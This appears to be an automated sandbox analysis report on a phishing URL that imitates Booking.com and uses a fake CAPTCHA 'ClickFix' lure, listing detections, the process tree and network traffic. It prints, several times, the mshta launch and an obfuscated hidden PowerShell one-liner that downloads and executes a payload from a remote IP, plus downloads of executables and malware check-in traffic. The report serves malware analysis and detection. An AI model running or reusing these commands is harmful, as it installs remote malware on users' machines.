Windows Analysis Report
http://roombedsrewiews.com

Overview

General Information

Sample URL: http://roombedsrewiews.com
Analysis ID: 1651034

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page adds suspicious text to clipboard
Injects a PE file into a foreign process
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic

Classification

Classification chart axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
  • System is w10x64_ra
  • chrome.exe (PID: 5580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,6627453953828994574,1927372697243055533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://roombedsrewiews.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 8036 cmdline: "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 3724 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5128 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • MSBuild.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Source | Rule | Description | Author | Strings
00000010.00000002.1645128494.0000020F80402000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000010.00000002.1645128494.0000020F8049A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000014.00000002.2010937734.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000014.00000002.2022674073.0000000003151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
0.0.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
0.1.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
0.2.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |

                System Summary

                Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 92.255.85.2, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7536, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 50042
                Source: Network Connection, Author: Kiran kumar s, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7536, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 50043
                Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ProcessId: 8132, ProcessName: powershell.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8132, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", ProcessId: 3724, ProcessName: csc.exe
                Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8132, TargetFilename: C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ProcessId: 8132, ProcessName: powershell.exe
                Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6636, ProcessName: svchost.exe

                Data Obfuscation

                Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8132, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", ProcessId: 3724, ProcessName: csc.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-03-28T11:28:19.688227+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.17 | 50041 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:28:19.688227+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.17 | 50041 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:28:20.924989+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.17 | 50041 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:28:19.688227+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.17 | 50041 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:28:20.924989+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.17 | 50041 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:29:02.893297+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.17 | 50055 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:28:19.497799+0100 | 2860704 | 1 | A Network Trojan was detected | 192.168.2.17 | 50041 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:29:02.656192+0100 | 2860704 | 1 | A Network Trojan was detected | 192.168.2.17 | 50055 | 92.255.85.2 | 80 | TCP
                2025-03-28T11:29:02.893297+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.17 | 50055 | 92.255.85.2 | 80 | TCP

                AV Detection

                Source: C:\Users\user\AppData\Local\Temp\toaudqqy.dll, Avira: detection malicious, Label: TR/Dropper.Gen7

                Phishing

                Source: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI, Joe Sandbox AI: Score: 9, Reasons: The brand 'Booking.com' is a well-known online travel agency., The legitimate domain for Booking.com is 'booking.com'., The provided URL 'booking.roombedsrewiews.com' does not match the legitimate domain., The URL contains additional words 'roombedsrewiews', which is suspicious and indicative of phishing., The structure of the URL suggests an attempt to mimic the legitimate brand by using a similar name. DOM: 0.0.pages.csv
                Source: Yara match, File source: 0.0.pages.csv, type: HTML
                Source: Yara match, File source: 0.1.pages.csv, type: HTML
                Source: Yara match, File source: 0.2.pages.csv, type: HTML
                Source: unknown, HTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49717 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 104.21.61.69:443 -> 192.168.2.17:49723 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.17:49725 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 104.21.61.69:443 -> 192.168.2.17:49729 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 18.164.96.110:443 -> 192.168.2.17:49735 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49741 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49754 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49755 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.17:49758 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 23.204.6.193:443 -> 192.168.2.17:49771 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 134.213.193.62:443 -> 192.168.2.17:49774 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 18.164.96.110:443 -> 192.168.2.17:49777 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 104.17.208.240:443 -> 192.168.2.17:49778 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 104.17.209.240:443 -> 192.168.2.17:49780 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 104.17.209.240:443 -> 192.168.2.17:49784 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49787 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:50040 version: TLS 1.2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: chrome.exe, Memory has grown: Private usage: 1MB later: 39MB

                Networking

                Source: Network traffic, Suricata IDS: 2860704 - Severity 1 - ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network traffic, Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network traffic, Suricata IDS: 2058998 - Severity 1 - ET MALWARE Sheet RAT CnC Checkin : 192.168.2.17:50042 -> 92.255.85.2:7777
                Source: Network traffic, Suricata IDS: 2860704 - Severity 1 - ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile : 192.168.2.17:50055 -> 92.255.85.2:80
                Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Thu, 27 Mar 2025 12:00:58 GMT | Accept-Ranges: bytes | ETag: "9adde6f9fdb1:0" | Server: Microsoft-IIS/10.0 | Date: Fri, 28 Mar 2025 10:28:19 GMT | Content-Length: 458144
                Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Thu, 27 Mar 2025 21:51:51 GMT | Accept-Ranges: bytes | ETag: "fa7c8872629fdb1:0" | Server: Microsoft-IIS/10.0 | Date: Fri, 28 Mar 2025 10:28:20 GMT | Content-Length: 54272
                Source: global traffic, HTTP traffic detected: GET /a.mp4 HTTP/1.1 | Host: 92.255.85.2 | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /j.exe HTTP/1.1 | Host: 92.255.85.2
                Source: global traffic, HTTP traffic detected: GET /qx.exe HTTP/1.1 | Host: 92.255.85.2
                Source: global traffic, HTTP traffic detected: GET /line HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /b.mp4 HTTP/1.1 | Host: 92.255.85.2 | Connection: Keep-Alive
                Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network traffic, Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network traffic, Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:50055 -> 92.255.85.2:80
                Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.17:50055 -> 92.255.85.2:80
                Source: unknown, TCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknown, TCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknown, TCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown, TCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: roombedsrewiews.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1 | Host: roombedsrewiews.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9 | Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global traffic, HTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1 | Host: booking.roombedsrewiews.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: roombedsrewiews.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9 | Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/otSDKStub.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
